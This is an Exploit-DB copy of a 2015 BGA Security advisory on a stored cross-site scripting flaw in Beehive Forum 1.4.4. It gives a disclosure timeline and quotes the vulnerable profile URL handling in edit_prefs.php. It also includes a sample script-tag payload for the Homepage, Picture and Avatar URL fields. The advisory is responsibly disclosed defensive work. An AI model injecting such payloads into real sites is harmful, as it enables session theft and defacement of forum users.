Beehive Forum 1.4.4 - Persistent Cross-Site Scripting

EDB-ID:

36154




Platform:

PHP

Date:

2015-02-23


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Document Title:
============
Beehive Forum v1.4.4 Stored XSS Vulnerability

Author:
==============
Halil Dalabasmaz

Release Date:
===========
23 Feb 2015

Product & Service Introduction:
========================
Beehive is an open-source project for creating a high-configurable
frame-based discussion forum.

Vendor Homepage:
=================
http://www.beehiveforum.co.uk

Abstract Advisory Information:
=======================
BGA Security Team discovered an Stored XSS vulnerability in 
Beehive Forum v1.4.4

Vulnerability Disclosure Timeline:
=========================
20 Feb 2015 -   Contact with Vendor
21 Feb 2015	-   Vendor Response
22 Feb 2015 -   Vendor Fix
23 Feb 2015 -   Confirm Fix
23 Feb 2015 -   Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Beehive Forum v1.4.4 

Exploitation Technique:
==================
Remote, Unauthenticated

Severity Level:
===========
High

Technical Details & Description:
========================
Stored XSS

Tested On:
============
Iceweasel & Chromium

Sample Payload:
=================
http://"><script>alert('XSS');</script>

Proof of Concept (PoC):
=======================
Proof of Concept

The vulnerable inputs are "Homepage URL", "Picture URL" and "Avatar URL" on Profile Section.
Following line contain the vulnerability in edit_prefs.php; 

    if (isset($_POST['homepage_url'])) {

        $user_prefs['HOMEPAGE_URL'] = trim($_POST['homepage_url']);
        $user_prefs_global['HOMEPAGE_URL'] = (isset($_POST['homepage_url_global'])) ? $_POST['homepage_url_global'] == "Y" : true;

        if (strlen(trim($user_prefs['HOMEPAGE_URL'])) > 0) {

            if (preg_match('/^http:\/\//u', $user_prefs['HOMEPAGE_URL']) < 1) {
                $error_msg_array[] = gettext("Homepage URL must include http:// schema.");
                $valid = false;

            } else if (!user_check_pref('HOMEPAGE_URL', $user_prefs['HOMEPAGE_URL'])) {

                $error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Homepage URL"));
                $valid = false;
            }
        }
    }

    if (isset($_POST['pic_url'])) {

        $user_prefs['PIC_URL'] = trim($_POST['pic_url']);
        $user_prefs_global['PIC_URL'] = (isset($_POST['pic_url_global'])) ? $_POST['pic_url_global'] == "Y" : true;

        if (strlen(trim($user_prefs['PIC_URL'])) > 0) {

            if (preg_match('/^http:\/\//u', $user_prefs['PIC_URL']) < 1) {
                $error_msg_array[] = gettext("Picture URL must include http:// schema.");
                $valid = false;

            } else if (!user_check_pref('PIC_URL', $user_prefs['PIC_URL'])) {

                $error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Picture URL"));
                $valid = false;
            }
        }
    }

   if (strlen(trim($user_prefs['AVATAR_URL'])) > 0) {

      if (preg_match('/^http:\/\//u', $user_prefs['AVATAR_URL']) < 1) {
         $error_msg_array[] = gettext("Avatar URL must include http:// schema.");
         $valid = false;

         } else if (!user_check_pref('AVATAR_URL', $user_prefs['AVATAR_URL'])) {

               $error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Avatar URL"));
               $valid = false;
            }
        }

Solution Fix & Patch:
================
Upgrade the the script.

Security Risk:
==========
The risk of the vulnerabilities above estimated as high.

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without 
any warranty. BGA disclaims all  warranties, either expressed or 
implied, including the warranties of merchantability and capability for 
a particular purpose. BGA or its suppliers are not liable in any case of 
damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages.
			
Domain:     www.bga.com.tr
Social:     twitter.com/bgasecurity
Contact:    advisory@bga.com.tr
	
Copyright © 2015 | BGA - Bilgi Güvenliği Akademisi